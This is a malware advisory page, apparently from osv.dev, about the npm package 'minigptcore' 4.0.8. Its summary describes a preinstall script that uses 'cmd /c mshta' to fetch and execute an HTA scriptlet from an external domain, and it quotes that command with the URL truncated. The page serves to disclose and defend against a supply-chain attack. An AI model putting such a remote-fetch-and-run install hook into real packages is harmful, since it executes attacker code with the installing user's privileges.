npm

minigptcore @4.0.8

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC

Malicious

OSV ID

MAL-2026-10417

Ecosystem

npm

Summary

On npm install , the package's preinstall script (preinstall.js) invokes cmd /c mshta http://fixars.top/... , causing Windows mshta.exe to fetch and execute an HTA scriptlet from a hardcoded external domain over plain HTTP. The fetched content is unpinned, unverified, and unrelated to any documented package purpose, and executes with the privileges of the user running npm install . package.json ships placeholder metadata (empty author, empty keywords, generic description) consistent with a throwaway upload whose only functional effect is the remote-code-execution dropper.

Source: amazon-inspector (8be3fb8ddeae3078f0765ce77f9a329caacd7ee5741b2c96dcf8f613f5444ba0)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.